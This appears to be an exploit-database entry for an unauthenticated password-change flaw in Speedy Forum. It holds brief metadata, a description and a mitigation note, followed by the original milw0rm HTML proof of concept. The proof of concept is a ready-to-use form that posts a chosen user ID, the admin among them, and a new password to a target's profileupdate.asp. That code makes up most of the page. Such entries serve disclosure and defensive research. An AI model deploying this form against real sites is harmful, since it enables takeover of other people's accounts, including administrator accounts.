Speedy Forum User Pass Change

vendor:

User Pass Change

by:

ajann

7.5

CVSS

HIGH

User Pass Change

287

CWE

Product Name: User Pass Change

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2020

Speedy Forum User Pass Change

This exploit allows an attacker to change the user password of a Speedy Forum user by submitting a form with the user's name, email, ID, country, password, and re-password. The form does not have any authentication or authorization checks, allowing an attacker to change the user's password without their knowledge.

Mitigation:

Implement authentication and authorization checks on the form to ensure that only authorized users can change the user's password.

Source

Exploit-DB raw data:

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META http-equiv="Content-Type" content="text/html; charset=utf-8"></head><body>

<div bgcolor="#000000">
<form name="InputForm" method="post" target="_blank" onsubmit="return window.confirm(&quot;You are submitting information to an external page.\nAre you sure?&quot;);">
<b><font color="#808080" face="Verdana">Speedy Forum User Pass Change //
ajann</font></b><p><font face="Verdana" size="2" color="#FF0000"><b>User 
Name    
:   </b></font>
<input type="text" name="name" value="" size="20"> 
<font size="1" color="#C0C0C0" face="Arial"> Example: Surname 
Name</font><br>
<font face="Verdana" size="2" color="#FF0000"><b>User 
Mail        
:  </b></font>
<input type="text" name="email" value="" size="20">
<font size="1" color="#C0C0C0" face="Arial">   Example:
<a href="mailto:mail@domain.com" target="_blank">mail@domain.com</a></font><br>

<font face="Verdana" size="2" color="#FF0000"><b>User 
Ýd            
:  </b></font>
<input type="text" name="id" value="" size="20">
<font size="1" color="#C0C0C0" face="Arial">  Example: Ýd:1 
Admin</font><br>
<font face="Verdana" size="2" color="#FF0000"><b>User Country  :  
</b>
</font>
<select size="1" name="country">
<option value="0">Choose Country</option>
<option value="Turkey">Turkey</option>
</select> <font size="1" color="#C0C0C0" face="Arial"> Example: 
Turkey</font><br>

<b>

<font face="Verdana" size="2" color="#FF0000">User </font>
<font face="Verdana" size="2" color="#0000FF">Pass </font>
<font face="Verdana" size="2" color="#FF0000">      
:  </font></b>

<input type="text" name="password" value="Password" size="20"> 
<font size="1" color="#C0C0C0" face="Arial"> Example: 123456</font><br>
<b>
<font face="Verdana" size="2" color="#FF0000">User </font>
<font face="Verdana" size="2" color="#0000FF">RePass</font><font face="Verdana" size="2" color="#FF0000">  
:  </font></b>

<input type="text" name="passwordre" value="Re Password" size="20"> 
<font size="1" color="#C0C0C0" face="Arial"> Example: 123456</font><br>

<font face="Verdana" size="2" color="#FF0000"><b>Form Action    : 
</b>
</font>

<input type="text" name="adres" value="profileupdate.asp" size="20"> 
<font size="1" color="#C0C0C0" face="Arial"> Example: 
http://[target]/[path]/profileu<WBR>pdate.asp</font></p>

<p>

<input type="submit" name="Submit" value="Change"> </p>

<br>

 </form>

</div></body></html>

# milw0rm.com [2006-05-29]